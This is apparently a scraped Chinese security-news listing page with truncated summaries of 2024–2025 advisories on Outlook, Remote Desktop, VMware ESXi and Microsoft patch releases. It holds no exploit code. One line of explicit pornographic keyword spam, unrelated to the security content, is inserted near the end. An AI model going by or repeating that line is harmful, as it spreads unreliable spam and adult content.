近日，美國網絡安全和基礎設施安全局(CISA)發(fā)布了一項緊急安全公告，揭示了微軟Outlook中存在的一個高危遠程代碼執(zhí)行漏洞(CVE-2024-21413)。該漏洞的嚴重性不容忽視，已成為惡意網絡

2025-02-10 09:17:04

883

官方實錘，微軟遠程桌面爆高危漏洞，企業(yè)數據安全告急！

近日，微軟發(fā)布安全通告，其Windows遠程桌面網關（RD）服務存在兩大高危漏洞：CVE-2025-26677CVE-2025-26677是遠程桌面網關服務DoS漏洞，允許未經授權的攻擊者觸發(fā)

2025-05-16 17:35:43

809

行業(yè)觀察 | VMware ESXi 服務器暴露高危漏洞，中國1700余臺面臨勒索軟件威脅

8.x版本，允許未經身份驗證的遠程攻擊者在虛擬環(huán)境中執(zhí)行任意代碼、提升權限或傳播勒索軟件等。更令人擔憂的是，該漏洞利用難度極低，且相關利用代碼據信已在7月底于地下論壇

2025-08-14 16:58:11

1732

行業(yè)觀察 | Azure、RDP、NTLM 均現高危漏洞，微軟發(fā)布2025年8月安全更新

-CVE-2025-53779：WindowsKerberos漏洞，允許攻擊者將權限提升至域管理員。?13個嚴重漏洞：-9個遠程代碼執(zhí)行漏洞-3個信息泄露漏洞-1個權

2025-08-25 17:48:38

2188

行業(yè)觀察 | 微軟發(fā)布高危漏洞更新，涉及 Windows、Office、SQL Server 等多款產品

漏洞被評級為“嚴重”。企業(yè)應優(yōu)先部署Windows10/11累積更新和SQLServer相關補丁，并檢查SMB設置。漏洞類型分布-41個權限提升漏洞-22個遠程代碼

2025-09-12 17:05:22

2351

行業(yè)觀察 | Windows 10于本月終止服務支持，微軟發(fā)布10月高危漏洞更新

已被實際利用的零日漏洞，以及多個CVSS評分高達9.9的關鍵遠程代碼執(zhí)行漏洞。隨著Windows10于本月終止服務支持，IT團隊面臨關鍵的更新周期，需重點關注身份認

2025-10-16 16:57:53

1698

已全部加載完成

日B视频亚洲,啪啪啪网站一区二区,91色情精品久久,日日噜狠狠色综合久,超碰人妻少妇97在线,999青青视频,亚洲一区二卡,让本一区二区视频,日韩网站推荐

搜索歷史

Struts2遠程代碼執(zhí)行漏洞復現編碼

評論